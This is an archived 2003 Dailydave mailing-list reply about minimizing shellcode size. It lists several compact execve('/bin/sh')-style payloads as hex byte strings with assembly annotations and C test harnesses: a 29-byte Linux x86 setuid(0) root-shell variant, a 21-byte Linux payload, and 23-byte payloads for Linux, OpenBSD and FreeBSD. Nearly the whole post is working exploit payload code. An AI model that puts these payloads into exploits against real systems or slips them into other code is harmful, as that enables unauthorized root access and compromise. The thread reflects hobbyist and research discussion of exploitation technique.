Dailydave mailing list archives
Re: Shellcode Size
From: Max Vision <vision () whitehats com>
Date: Mon, 24 Nov 2003 13:48:48 -0800 (PST)
On Sun, 23 Nov 2003, David Maynor wrote:
What is the smallest shellcode anybidy has written to spawn a simple shell with uid 0. I am down to 31 bytes and I was wondering if anybody has smaller.
I would swear someone sent me obscenely small "private" shellcode one of
the many previous times this question has come up (years ago), but I can't
find it. Anyhow, how about these 29bytes, untested:
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\x31\xc9\xf7\xe1\x04\x0b\x52\x68"
"\x2f\x61\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\xcd\x80";
That's assuming you're talking linux x86. I just took zasta's 21byte
shellcode and prepended setuid(0). I think it takes 10 bytes to do
setreuid(0,0) corrent me if I'm wrong.
("\x31\xc0\x89\xc3\x89\xc1\xb0\x47\xcd\x80" /* setregid(0, 0) */)
Here is zasta's code, null argv so uses ash...
/* 21 byte execve("/bin/ash",0,0); shellcode for linux x86
* by zasta (zasta () darkircop org) */
#include <unistd.h>
#include <stdio.h>
char shellcode[] = "\x31\xc9\xf7\xe1\x04\x0b\x52\x68"
"\x2f\x61\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\xcd\x80";
void code() {
__asm__("
xor %ecx,%ecx
mul %ecx
addb $0xb,%al
push %edx
push $0x6873612f
push $0x6e69622f
mov %esp,%ebx
int $0x80
");
}
void (*ptr)() = (void(*)()) &shellcode[0];(*ptr)();
the next smallest shellcodes i have seen are 23 bytes each
(linux/freebsd/openbsd):
/************************************************************
* Linux 23 byte execve code. Greetz to preedator *
* marcetam *
* admin () marcetam net *
*************************************************************/
char linux[]=
"\x99" /* cdq */
"\x52" /* push %edx */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x89\xe3" /* mov %esp,%ebx */
"\x52" /* push %edx */
"\x54" /* push %esp */
"\x54" /* push %esp */
"\x59\x6a" /* pop %ecx */
"\x0b\x58" /* push $0x0b */
"\xcd\x80"; /* int $0x80 */
int main(){
void (*run)()=(void *)linux;
printf("%d bytes \n",strlen(linux));
run();
}
/************************************************************
* OpenBSD 23 byte execve code. Greetz to preedator *
* marcetam *
* admin () marcetam net *
*************************************************************/
char open_bsd[]=
"\x99" /* cdq */
"\x52" /* push %edx */
"\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */
"\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */
"\x89\xe3" /* mov %esp,%ebx */
"\x52" /* push %edx */
"\x54" /* push %esp */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x6a\x3b" /* push $0x3b */
"\x58" /* pop %eax */
"\xcd\x80"; /* int $0x80 */
int main(){
void (*run)()=(void *)open_bsd;
printf("%d bytes\n",strlen(open_bsd));
run();
}
/* FreeBSD 23 byte execve code. Greetz to anathema, the first who published *
* this way of writing shellcodes. *
* greetz to preedator marcetam *
* admin () marcetam net *
****************************************************************************/
char fbsd_execve[]=
"\x99" /* cdq */
"\x52" /* push %edx */
"\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */
"\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */
"\x89\xe3" /* movl %esp,%ebx */
"\x51" /* push %ecx - or %edx :) */
"\x52" /* push %edx - or %ecx :) */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x6a\x3b" /* push $0x3b */
"\x58" /* pop %eax */
"\xcd\x80"; /* int $0x80 */
int main() {
void (*run)()=(void *)fbsd_execve;
printf("%d bytes \n",strlen(fbsd_execve));
}
Max
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://www.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- Shellcode Size David Maynor (Nov 24)
- Re: Shellcode Size Max Vision (Nov 24)